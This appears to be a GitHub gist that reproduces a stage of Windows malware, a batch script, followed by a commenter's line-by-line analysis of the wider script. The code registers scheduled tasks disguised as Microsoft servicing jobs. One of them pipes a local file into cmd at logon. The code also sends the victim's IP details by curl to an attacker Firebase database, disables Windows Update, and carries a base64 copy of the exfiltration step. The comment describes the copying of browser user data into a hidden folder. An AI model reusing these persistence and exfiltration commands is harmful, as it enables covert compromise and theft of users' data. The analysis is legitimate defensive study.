echo   ^</Actions^> >> C:\systemfile\temp6.xml
echo ^</Task^> >> C:\systemfile\temp6.xml

schtasks /create /xml "C:\systemfile\temp6.xml" /tn "\Microsoft\Windows\Servicing\ServiceCleanup" /F
Del "C:\systemfile\temp6.xml"












echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp7.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp7.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp7.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp7.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp7.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp7.xml
echo     ^<URI^>\Microsoft\Windows\Shell\ObjectTask^</URI^> >> C:\systemfile\temp7.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp7.xml
echo   ^<Triggers^> >> C:\systemfile\temp7.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp7.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo       ^<Delay^>PT7S^</Delay^> >> C:\systemfile\temp7.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp7.xml
echo   ^</Triggers^> >> C:\systemfile\temp7.xml
echo   ^<Principals^> >> C:\systemfile\temp7.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp7.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp7.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp7.xml
echo     ^</Principal^> >> C:\systemfile\temp7.xml
echo   ^</Principals^> >> C:\systemfile\temp7.xml
echo   ^<Settings^> >> C:\systemfile\temp7.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp7.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp7.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp7.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp7.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp7.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp7.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp7.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp7.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp7.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp7.xml
echo   ^</Settings^> >> C:\systemfile\temp7.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp7.xml
echo     ^<Exec^> >> C:\systemfile\temp7.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp7.xml
echo       ^<Arguments^>/c if exist ^%temp^%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN ^"\Microsoft\Windows\AppID\VerifiedCert^" ^&amp; SCHTASKS /End /TN ^"\Microsoft\Windows\Application Experience\Maintenance^" ^&amp; schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /DISABLE ^&amp; schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /DISABLE ^&amp; schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /ENABLE ^&amp; schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /ENABLE)^</Arguments^> >> C:\systemfile\temp7.xml
echo     ^</Exec^> >> C:\systemfile\temp7.xml
echo   ^</Actions^> >> C:\systemfile\temp7.xml
echo ^</Task^> >> C:\systemfile\temp7.xml

schtasks /create /xml "C:\systemfile\temp7.xml" /tn "\Microsoft\Windows\Shell\ObjectTask" /F
Del "C:\systemfile\temp7.xml"














echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp8.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp8.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp8.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp8.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp8.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp8.xml
echo     ^<URI^>\Microsoft\Windows\Clip\ServiceCleanup^</URI^> >> C:\systemfile\temp8.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp8.xml
echo   ^<Triggers^> >> C:\systemfile\temp8.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp8.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo       ^<Delay^>PT5M^</Delay^> >> C:\systemfile\temp8.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp8.xml
echo   ^</Triggers^> >> C:\systemfile\temp8.xml
echo   ^<Principals^> >> C:\systemfile\temp8.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp8.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp8.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp8.xml
echo     ^</Principal^> >> C:\systemfile\temp8.xml
echo   ^</Principals^> >> C:\systemfile\temp8.xml
echo   ^<Settings^> >> C:\systemfile\temp8.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp8.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp8.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp8.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp8.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp8.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp8.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp8.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp8.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp8.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp8.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp8.xml
echo   ^</Settings^> >> C:\systemfile\temp8.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp8.xml
echo     ^<Exec^> >> C:\systemfile\temp8.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp8.xml
echo       ^<Arguments^>/c more "C:\systemfile\c.z" ^| cmd  ^&amp; if EXIST "C:\Windows\security\pywinvera\libs" (schtasks /delete /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F)^</Arguments^> >> C:\systemfile\temp8.xml
echo     ^</Exec^> >> C:\systemfile\temp8.xml
echo   ^</Actions^> >> C:\systemfile\temp8.xml
echo ^</Task^> >> C:\systemfile\temp8.xml

schtasks /create /xml "C:\systemfile\temp8.xml" /tn "\Microsoft\Windows\Clip\ServiceCleanup" /F
Del "C:\systemfile\temp8.xml"


















FOR /F "tokens=*" %a in ('curl.exe -L http://ip-api.com/json') do SET widget=%a

set widget=%widget:"=\"%
set widget=%widget: =_%
echo %widget%


curl.exe -X POST -d "%widget%" https://ping-newdatabase-default-rtdb.firebaseio.com/Userinfo.json




sc.exe stop wuauserv
sc.exe config wuauserv start=demand



#endregion encoding
<#
Rk9SIC9GICJ0b2tlbnM9KiIgJWEgaW4gKCdjdXJsLmV4ZSAtTCBodHRwOi8vaXAtYXBpLmNvbS9qc29uJykgZG8gU0VUIHdpZGdldD0lYQoKc2V0IHdpZGdldD0ld2lkZ2V0OiI9XCIlCnNldCB3aWRnZXQ9JXdpZGdldDogPV8lCmVjaG8gJXdpZGdldCUKCgpjdXJsLmV4ZSAtWCBQT1NUIC1kICIld2lkZ2V0JSIgaHR0cHM6Ly9teWRhdGFiYXNlLWY4N2RlLWRlZmF1bHQtcnRkYi5maXJlYmFzZWlvLmNvbS9Vc2VyaW5mby5qc29uCg==
#>
@OptionalM
Copy link

OptionalM commented Apr 9, 2022

This is the script that gets actually executed, after being called with new headers from Stage 1.

Lines 1-2000

These lines seem like they are doing what they are supposed to.
Line 156 downloads a config under the author's control though.
Line 475 is an encoded .pow file that does not look suspicious.
Line 1789 downloads an executable under the author's control. As of now it seems to be safe.
Line 1821 might look suspicious because of the encoding, but it's just a regular .lnk invoking MicrosoftCorporationII.WindowsSubsystemForAndroid_8wekyb3d8bbwe!SettingsApp.

Lines 2k+

Finally, the unwanted code begins at line 2000

region chromepath

Line 2041 starts Task 2 that's been created by Stage 3.
This task runs a hidden Chrome instance inside C:\systemfile.
Lines 2043-2046 then wait for that instance to have created the Default\Preferences folder.
Lines 2048-2052 stop the running Chrome instance.
Lines 2055-2070 want to set the Chrome preference such that it does not ask for confirmation when downloading files.
Lines 2090/2091 create a mysterious ex.txt?
Lines 2093-2100 copy user data from MS Edge, Brave and/or Chrome into the hidden folder C:/systemfile

region encoding

Lines 2110 - 2114 are base64 encoded and can be found decoded here as Stage 3.
They are referenced by line 9 of Stage 1.

Unused lines

If decoded and executed line 2117 would submit the users IP address to the attackers firebase.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment